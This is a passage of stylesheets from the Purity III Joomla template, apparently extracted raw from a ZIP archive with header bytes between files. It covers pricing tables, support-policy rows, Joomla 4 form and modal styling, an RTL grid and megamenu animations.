  display: table-cell;
  width: 80px;
  border-left: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-left: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: right;
  font-weight: bold;
  padding-right: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-left: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-right: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-left: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 5px 0 0 rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #0077bb;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #0077bb;
  border-color: #0077bb;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-right: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-right: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
}

.sr-only,
.visually-hidden,
.visually-hidden-focusable:not(:focus):not(:focus-within) {
  position: absolute !important;
  width: 1px !important;
  height: 1px !important;
  padding: 0 !important;
  margin: -1px !important;
  overflow: hidden !important;
  clip: rect(0, 0, 0, 0) !important;
  white-space: nowrap !important;
  border: 0 !important;
}
.btn-close {
  background: #f0f0f0;
  border: 0;
  border-radius: 50%;
  color: #999;
  height: 32px;
  text-align: center;
  width: 32px;
  margin-right: auto;
  appearance: none;
  -moz-appearance: none;
  -webkit-appearance: none;
}
.btn-close::before {
  content: "\f00d";
  display: block;
  font-family: FontAwesome3 !important;
  font-size: 16px;
}
.btn-close:hover {
  cursor: pointer;
  color: #666;
}
.field-calendar .input-group input[type="text"] {
  border-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.field-calendar .input-group .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.field-calendar a:hover,
.field-calendar a:focus,
.field-calendar a:active {
  cursor: pointer;
}
joomla-field-custom.field-custom-wrapper .input-group {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group input[type="text"] {
  border-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn {
  border-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select {
  background-color: #2f7d32;
  border-color: #2f7d32;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:active {
  background-color: #296e2c;
  border-color: #296e2c;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear {
  background-color: #c52827;
  border: 1px solid #c52827;
  border-top-left-radius: 5px;
  border-bottom-left-radius: 5px;
  color: #fff;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:active {
  background-color: #ae2322;
  border-color: #c52827;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn span {
  line-height: 38px;
}
.input-group {
  position: relative;
  display: flex;
  flex-wrap: nowrap;
  align-items: stretch;
  width: 100%;
}
.input-group .form-control {
  width: auto;
}
.input-group .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.com-tags-tag.tag-category .filters {
  display: flex;
  align-items: center;
}
.users-profile-custom-joomlatoken .dl-horizontal dd {
  text-overflow: ellipsis;
  overflow: hidden;
  white-space: nowrap;
  width: 400px;
}
.com-finder .form-inline > label {
  margin-bottom: 10px;
}
.com-finder .input-group {
  display: flex;
  align-items: center;
}
.com-finder .input-group .btn:last-of-type {
  border-radius: 5px;
  margin-right: 10px;
}
.j40 joomla-field-media .input-group {
  max-width: 356px;
}
.j40 joomla-field-media .input-group input[type="text"] {
  border-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.j40 joomla-field-media .input-group .form-control {
  border-top-right-radius: 0;
  flex: 1;
}
.j40 joomla-field-media .input-group .btn {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.j40 joomla-field-media .input-group .icon-times::before {
  content: "\f00d";
  display: inline-block;
  font-weight: FontAwesome;
  font-size: 16px;
}
.j40 .form-control-feedback {
  font-size: 12px;
  font-weight: 400;
  top: auto;
  bottom: -28px;
  line-height: 1;
  width: auto;
  white-space: nowrap;
}
.j40 .com-newsfeeds-newsfeed__items {
  margin: 0;
  padding: 0;
  list-style: none;
}
.j40 .com-newsfeeds-newsfeed__items li {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.j40 .com-newsfeeds-newsfeed__items .feed-link {
  margin-bottom: 20px;
}
.j40 figure {
  margin-bottom: 20px;
}
.j40 figure img {
  max-width: 100%;
}
.j40 #com-contact-form {
  margin-bottom: 20px;
}
.j40 .request-confirm fieldset legend {
  font-size: 16px;
  padding-bottom: 20px;
}
.j40 .article-aside .icons {
  float: left;
}
.j40 .article-aside .icons a {
  display: block;
  position: relative;
}
.j40 .article-aside .icons [role="tooltip"] {
  background-color: rgba(0, 0, 0, 0.6);
  border-radius: 3px;
  color: #fff;
  display: none;
  padding: 2px 4px;
  position: absolute;
  white-space: nowrap;
  left: 0;
  max-width: none;
}
.j40 .article-aside .icons:hover [role="tooltip"] {
  display: block;
}
.j40 .password-group .input-group {
  display: flex;
  flex-wrap: nowrap;
}
.j40 .password-group .input-group input {
  width: auto;
}
.j40 .edit.item-page .choices__inner {
  padding-left: 6px;
}
.j40 .edit.item-page .choices__inner button {
  background-color: rgba(255, 255, 255, 0.3);
  border-radius: 8px;
  border: 0;
  margin-right: 6px;
  padding: 1px 6px;
}
.j40 .edit.item-page .choices__inner button:hover,
.j40 .edit.item-page .choices__inner button:focus,
.j40 .edit.item-page .choices__inner button:active {
  background-color: rgba(255, 255, 255, 0.5);
  cursor: pointer;
}
.profile-edit .password-group .input-group input {
  min-width: 268px;
}
.profile-edit .control-group {
  margin-top: 20px;
}
.profile-edit .control-group .controls {
  float: none;
}
.j40 .joomla-modal.show,
.j42 .joomla-modal.show {
  background-color: rgba(0, 0, 0, 0.5);
  opacity: 1;
}
.j40 .joomla-modal.show .modal-dialog,
.j42 .joomla-modal.show .modal-dialog {
  top: 50%;
  transform: translateY(-50%);
}
.j40 .joomla-modal.show .modal-dialog .modal-content,
.j42 .joomla-modal.show .modal-dialog .modal-content {
  border-radius: 5px;
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
}
.j40 .jviewport-width80,
.j42 .jviewport-width80 {
  width: 80vw;
}
.j40 .jviewport-height70,
.j42 .jviewport-height70 {
  height: 70vh;
}
.j40 .modal-header,
.j42 .modal-header {
  align-items: center;
  border-bottom: 1px solid #ddd;
  display: flex;
  padding: 12px 16px;
  justify-content: space-between;
}
.j40 .modal-header h3,
.j42 .modal-header h3 {
  font-size: 24px;
  font-weight: 500;
}
.j40 .modal-body,
.j42 .modal-body {
  overflow: hidden;
  padding: 0;
}
.j40 .iframe,
.j42 .iframe {
  border: 0;
  height: 100%;
  width: 100%;
}
.j40 [role=tooltip]:not(.show),
.j42 [role=tooltip]:not(.show) {
  left: 5em;
  z-index: 1070;
  display: none;
  max-width: 100%;
  padding: .5em;
  margin: .5em;
  color: #000;
  text-align: start;
  background: #fff;
  border: 1px solid #6d757e;
  border-radius: .25rem;
}
.j40 .container-popup [id="filter[search]-desc"],
.j42 .container-popup [id="filter[search]-desc"] {
  top: 100%;
  bottom: auto;
}
.j40 .btn-toolbar,
.j40 .js-stools-container-filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: flex-end;
  align-items: center;
}
.j40 .ordering-select {
  display: flex;
  align-items: center;
}
.j40 .btn-group {
  margin-left: 10px;
}
.j40 .js-stools-container-filters {
  display: none;
  margin-top: 20px;
}
.j40 .js-stools-container-filters.js-stools-container-filters-visible {
  display: flex;
}
.j40 .js-stools-container-filters .js-stools-field-filter {
  margin-left: 10px;
}
.j40 .js-stools-container-filters .js-stools-field-filter:last-child {
  margin-left: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner {
  border: 0;
  min-height: auto;
  padding: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner input {
  margin-bottom: 0;
}
.j40 #contact-form label.required {
  position: relative;
}
.j40 #contact-form label.required .form-control-feedback {
  background: #fff;
  border-radius: .5rem;
  box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
  border: 1px solid #e5e7eb;
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 0 .5rem;
  left: auto;
  right: calc(132%);
  bottom: calc(132%);
}
.contentpane .subhead {
  border-bottom: 1px solid #ddd;
  padding-bottom: 12px;
}
.contentpane .subhead .btn-toolbar {
  display: flex;
  gap: 10px;
  margin: 0;
}
.contentpane .subhead .btn-toolbar::before,
.contentpane .subhead .btn-toolbar::after {
  display: none;
}
.contentpane .media-sidebar {
  border-left: 1px solid #ddd;
}
.contentpane .media-toolbar {
  border-bottom: 1px solid #ddd;
  margin-left: 20px;
  padding-right: 20px;
}
.contentpane .media-toolbar .media-toolbar-icon {
  border-right: 1px solid #ddd;
}
.contentpane .media-toolbar .icon-search-minus,
.contentpane .media-toolbar .icon-search-plus {
  font-family: FontAwesome3;
}
.contentpane .media-toolbar .icon-search-minus::before,
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f010";
  display: block;
  font-size: 16px;
}
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f00e";
}
.com_contact fieldset.filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
}
.com_contact .com-contact-featured__filter {
  display: flex;
  flex-wrap: wrap;
}
.com_contact .display-limit {
  margin: 0;
}
.com_contact table.category {
  margin-top: 2rem;
}


.off-canvas body > .autocompleter-choices {
  width: 0px;
  left: auto;
}
article img[align=left],
.img_caption.left,
.pull-left.item-image {
  margin: 0 40px 20px 0;
}
article img[align=right],
.img_caption.right,
.pull-right.item-image {
  margin: 0 0 20px 40px;
}
.languageswitcherload ul {
  float: left;
}PKӜ�\�('�

"purity_iii/css/rtl/legacy-grid.cssnu&1i�.row-flex {
  display: flex;
  flex-wrap: wrap;
  align-items: stretch;
}
.row-fluid {
  margin-left: -20px;
  margin-right: -20px;
}
[class*="span"] {
  float: right;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-right: 100%;
}
.offset11 {
  margin-right: 91.66666667%;
}
.offset10 {
  margin-right: 83.33333333%;
}
.offset9 {
  margin-right: 75%;
}
.offset8 {
  margin-right: 66.66666667%;
}
.offset7 {
  margin-right: 58.33333333%;
}
.offset6 {
  margin-right: 50%;
}
.offset5 {
  margin-right: 41.66666667%;
}
.offset4 {
  margin-right: 33.33333333%;
}
.offset3 {
  margin-right: 25%;
}
.offset2 {
  margin-right: 16.66666667%;
}
.offset1 {
  margin-right: 8.33333333%;
}
.offset0 {
  margin-right: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKӜ�\T$���=�=purity_iii/css/rtl/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-right: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-right: -5px;
  margin-left: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-left: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-left: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-left: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  right: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  right: auto;
  left: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  right: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  right: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  right: auto;
  left: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  right: 0;
  margin-right: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  left: 0;
  bottom: 0;
  right: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-right: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-right: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-right: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    display: table;
    content: " ";
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    right: 0 !important;
    margin-right: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
